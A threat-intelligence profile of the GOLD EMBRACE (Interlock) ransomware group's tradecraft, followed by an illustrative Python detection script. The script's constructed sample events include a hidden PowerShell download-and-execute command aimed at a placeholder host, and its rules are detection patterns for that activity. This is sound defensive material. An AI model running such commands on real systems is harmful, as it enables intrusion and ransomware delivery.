Summary
GOLD EMBRACE is a financially motivated cybercriminal threat group operating the Interlock double extortion ransomware, first observed in late September 2024. The group targets organizations across North America and Europe, with victims from a range of sectors including healthcare, government, education, and manufacturing. Victims who decline to pay are named on the group's dedicated leak site, which they have named the "Worldwide Secrets Blog". Ransom notes do not include a demand or payment instructions; instead, victims receive a unique code and are directed to a Tor-hosted negotiation portal. Some third-party researchers have noted technical overlaps with the Rhysida ransomware family (operated by GOLD VICTOR), including similarities in ransom note structure and encryption logic, though no definitive relationship has been established.
The group gains initial access primarily through drive-by downloads served via compromised legitimate websites, which present visitors with fake browser update prompts or application error messages impersonating Google Chrome, Microsoft Teams, Fortinet FortiClient VPN, and Cisco AnyConnect. From early 2025, GOLD EMBRACE added the ClickFix and FileFix social engineering techniques, tricking users into pasting malicious PowerShell commands via fake CAPTCHA challenges into the Windows Run Command dialog or File Explorer address bar. Sophos researchers have observed the group exploiting CVE-2026-20131, an at-the-time zero-day vulnerability in Cisco Secure Firewall Management Center (FMC) Software. The group also acquires credentials from initial access brokers. GOLD EMBRACE has been observed using MintLoader to deliver post-exploitation implants following initial compromise.
After establishing a foothold, operators deploy the group's proprietary InterlockRAT and NodeSnakeRAT for command-and-control (C2), both of which route traffic through Cloudflare TryCloudflare tunnels to evade network-based detection. NodeSnake is written in Node.js, with a PHP variant appearing in July 2025, and features a modular design enabling customization of persistence, data collection, and lateral movement capabilities for each victim. Cobalt Strike and SystemBC provide additional C2 and proxy capability. Credentials are harvested using a custom stealer (cht.exe) and keylogger (klg.dll), alongside commodity stealers including Lumma Stealer and Berserk Stealer. Lateral movement is conducted via RDP, AnyDesk, PuTTY, and ScreenConnect. Prior to encryption, bulk data is exfiltrated to Azure storage blobs using AzCopy and Azure Storage Explorer, with WinSCP used in some intrusions.
All custom malware is protected by a proprietary packer, and the group deploys Hotta Killer, a custom EDR-termination tool exploiting a zero-day in the gaming driver GameDriverx64.sys (CVE-2025-61155) via a Bring Your Own Vulnerable Driver attack, immediately before encryption. The Interlock encryptor targets both Windows and Linux environments, including Nutanix AHV hypervisors and VMware ESXi, appending .interlock or .!nt3rlock extensions to encrypted files.
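As an added example (not code from Sophos or from the group), the following Python script maps the observable tells described above (PowerShell spawned from the shell after a ClickFix paste, DNS to TryCloudflare quick tunnels, the GameDriverx64.sys driver being loaded, .interlock/.!nt3rlock file extensions, AzCopy to Azure blob storage) to weighted detection rules and runs them over constructed sample events. The key=value event format, host names, defanged "hxxp" URL and rule weights are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed sample events (not real telemetry) in a simplified key=value form;
# cmdline values are quoted so they may contain spaces.
SAMPLE_EVENTS = [
    'type=process host=WS01 parent=explorer.exe image=powershell.exe cmdline="powershell -w hidden -c iwr hxxp://example.invalid/a|iex"',
    'type=dns host=WS01 query=quiet-lake-1234.trycloudflare.com',
    'type=driver host=WS01 image=C:\\Windows\\Temp\\GameDriverx64.sys',
    'type=process host=WS02 parent=explorer.exe image=notepad.exe cmdline="notepad.exe notes.txt"',
    'type=dns host=WS02 query=www.example.com',
    'type=process host=FS01 parent=cmd.exe image=azcopy.exe cmdline="azcopy copy D:\\data https://acct.blob.core.windows.net/c"',
    'type=file host=FS01 path=\\\\fs01\\share\\report.xlsx.!nt3rlock',
]

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line):
    """Turn one key=value line into a dict; quoted values lose their quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}

def _lower(e, key):
    return e.get(key, "").lower()

# (rule name, weight, predicate). Weights are assumed values, higher = more specific to Interlock.
RULES = [
    # ClickFix/FileFix: PowerShell launched by the shell (Run dialog / Explorer) with hidden-window or download-and-execute tells
    ("clickfix_powershell", 3, lambda e: e.get("type") == "process" and _lower(e, "parent") == "explorer.exe"
        and _lower(e, "image") == "powershell.exe"
        and re.search(r"-w\s+hidden|\biex\b|\biwr\b|invoke-expression", e.get("cmdline", ""), re.I)),
    # InterlockRAT / NodeSnake C2 routed through TryCloudflare quick tunnels
    ("trycloudflare_tunnel", 2, lambda e: e.get("type") == "dns" and _lower(e, "query").endswith(".trycloudflare.com")),
    # Hotta Killer BYOVD: the gaming driver named above should not be loading on a server or workstation
    ("gamedriver_byovd", 4, lambda e: e.get("type") == "driver" and _lower(e, "image").endswith("gamedriverx64.sys")),
    # Encryptor output extensions
    ("interlock_extension", 5, lambda e: e.get("type") == "file" and re.search(r"\.(interlock|!nt3rlock)$", e.get("path", ""), re.I)),
    # AzCopy to Azure blob storage: dual-use tool, so low weight on its own
    ("azcopy_to_blob", 1, lambda e: e.get("type") == "process" and _lower(e, "image") == "azcopy.exe"
        and "blob.core.windows.net" in _lower(e, "cmdline")),
]

def evaluate(lines):
    """Return {host: (score, [rule names hit])} for every host with at least one hit."""
    hits = defaultdict(lambda: [0, []])
    for line in lines:
        e = parse_event(line)
        for name, weight, pred in RULES:
            if pred(e):
                hits[e.get("host", "?")][0] += weight
                hits[e.get("host", "?")][1].append(name)
    return {h: (s, names) for h, (s, names) in hits.items()}

if __name__ == "__main__":
    for host, (score, names) in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(f"{host}: score={score} rules={names}")
```

Hosts accumulating several rule hits across the kill chain (WS01 in the sample) are the ones to escalate first; a lone AzCopy hit is normal admin activity until paired with another rule.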